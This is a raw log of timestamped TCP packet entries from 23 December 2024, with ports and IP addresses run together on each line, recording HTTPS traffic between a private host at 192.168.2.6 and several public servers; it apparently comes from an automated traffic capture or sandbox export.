                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:26.084424019 CET44350031188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:26.084543943 CET50031443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:26.085263014 CET50031443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:26.085273981 CET44350031188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:26.087982893 CET50031443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:26.087992907 CET44350031188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:26.992484093 CET44350031188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:26.992564917 CET50031443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:26.992599010 CET44350031188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:26.992619991 CET44350031188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:26.992645025 CET50031443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:26.992666960 CET50031443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:26.992999077 CET50031443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:26.993016958 CET44350031188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:26.995857000 CET50039443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:26.995899916 CET44350039188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:26.995989084 CET50039443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:26.996567011 CET50039443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:26.996582985 CET44350039188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:28.399416924 CET44350039188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:28.399545908 CET50039443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:28.400211096 CET50039443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:28.400217056 CET44350039188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:28.402138948 CET50039443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:28.402148962 CET44350039188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:29.359880924 CET44350039188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:29.359988928 CET44350039188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:29.360042095 CET50039443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:29.360076904 CET50039443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:29.360548019 CET50039443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:29.360569954 CET44350039188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:29.682904959 CET50046443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:29.682960987 CET4435004620.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:29.683120966 CET50046443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:29.684015989 CET50046443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:29.684037924 CET4435004620.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:30.260409117 CET44349959104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:30.260495901 CET44349959104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:30.260776997 CET49959443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:30.532222986 CET44349961104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:30.532426119 CET44349961104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:30.532497883 CET49961443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:31.711002111 CET49959443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:31.711040974 CET44349959104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:31.711055040 CET49961443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:31.711076975 CET44349961104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:31.922935009 CET4435004620.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:31.923204899 CET50046443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:31.925198078 CET50046443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:31.925209045 CET4435004620.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:31.925496101 CET4435004620.198.119.84192.168.2.6
Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:06.506289005 CET44351306172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:06.507558107 CET44351306172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:06.507867098 CET51306443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:06.507889986 CET44351306172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:06.507903099 CET44351306172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:06.508387089 CET51306443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:06.509782076 CET51306443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:06.514400005 CET51306443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:06.558053970 CET52133443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:06.644979954 CET44351306172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:06.811518908 CET51306443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:06.818459034 CET51306443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:06.827172995 CET44351306172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:06.827281952 CET44351306172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:06.827296019 CET44351306172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:06.827306986 CET44351306172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:06.827594995 CET51306443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:06.827805042 CET51306443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:06.833602905 CET44351306172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:06.836086035 CET44351306172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:06.836132050 CET44351306172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:06.836620092 CET51306443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:07.126934052 CET44351306172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:07.130099058 CET44351306172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:07.133616924 CET44351306172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:07.135222912 CET44351306172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:07.135550022 CET51306443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:07.142244101 CET44351306172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:07.171974897 CET52133443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:07.172013044 CET51306443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:07.341672897 CET44352133172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:07.341700077 CET44352133172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:07.341721058 CET44352133172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:07.341732979 CET44352133172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:07.342406988 CET52133443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:07.345452070 CET52133443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:07.360282898 CET52133443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:07.485594988 CET44352133172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:07.892954111 CET44352133172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:07.892961025 CET44352133172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:07.892965078 CET44352133172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:07.892970085 CET44352133172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:07.893033028 CET44352133172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:07.893039942 CET44352133172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:07.893042088 CET44352133172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:07.893445015 CET52133443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:07.893577099 CET52133443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:07.893748045 CET52133443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:08.207828045 CET44352133172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:08.237226009 CET52133443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:09.079799891 CET51306443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:09.080048084 CET51306443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:09.104105949 CET51306443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:09.104545116 CET51306443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:09.231499910 CET51306443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:09.232053041 CET51306443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:09.233994961 CET52133443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:09.234330893 CET52133443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:09.398930073 CET44351306172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:09.399530888 CET44351306172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:09.399543047 CET44351306172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:09.402410030 CET51306443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:09.404697895 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:09.405107975 CET61006443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:09.420425892 CET44351306172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:09.421446085 CET44351306172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:09.421590090 CET44351306172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:09.427447081 CET51306443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:09.550071001 CET44351306172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:09.550101995 CET44352133172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:09.550246954 CET44352133172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:09.550261974 CET44351306172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:09.550275087 CET44352133172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:09.550292015 CET44351306172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:09.550563097 CET51306443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:09.550796032 CET52133443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:09.705120087 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.164437056 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.164637089 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.172831059 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.181128025 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.181384087 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.190076113 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.199382067 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.199563980 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.208141088 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.218225956 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.218633890 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.224632978 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.234385014 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.234711885 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.242436886 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.251156092 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.251641989 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.260241032 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.268547058 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.268723011 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.277452946 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.285208941 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.285398006 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.293687105 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.303276062 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.303448915 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.311542988 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.320713997 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.320899010 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.329128027 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.337857008 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.338026047 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.346257925 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.354888916 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.355063915 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.363126040 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.371721983 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.371885061 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.381428957 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.388616085 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.388802052 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.397254944 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.404520988 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.404716015 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.412591934 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.419825077 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.419984102 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.427185059 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.434806108 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.434978962 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.442202091 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.449124098 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.449296951 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.458372116 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.463129997 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.463294983 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.466154099 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.469245911 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.471343994 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.473315954 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.477859974 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.478127956 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.479794979 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.483452082 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.483601093 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.487016916 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.489587069 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.489741087 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.498284101 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.501029968 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.501104116 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.501688957 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.503674984 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.503901958 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.506355047 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.510354996 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.510541916 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:12.129585981 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:12.129638910 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:12.129663944 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:12.129847050 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:12.129863024 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:12.129987001 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:12.130007982 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:12.149818897 CET61006443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:12.166276932 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:12.254206896 CET51306443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:12.254561901 CET51306443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:12.353866100 CET51306443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:12.353976965 CET51306443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:12.432415009 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:12.443273067 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:12.450145006 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:12.450501919 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:12.450514078 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:12.450526953 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:12.450681925 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:12.450695038 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:12.450707912 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:12.450797081 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:12.450870037 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:12.450886011 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:12.450898886 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:12.450908899 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:12.452023983 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:12.463691950 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:12.463978052 CET44361006104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:12.489388943 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:12.503088951 CET44361006104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:12.503107071 CET44361006104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:12.503120899 CET44361006104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:12.503134012 CET44361006104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:12.503144026 CET44361006104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:12.503417015 CET61006443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:12.503689051 CET61006443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:12.503773928 CET61006443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:12.570789099 CET44351306172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:12.572663069 CET44351306172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:12.573072910 CET44351306172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:12.573509932 CET51306443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:12.670422077 CET44351306172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:12.671978951 CET44351306172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:12.672635078 CET44351306172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:12.674280882 CET51306443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:12.953566074 CET44352290104.70.121.51192.168.2.6
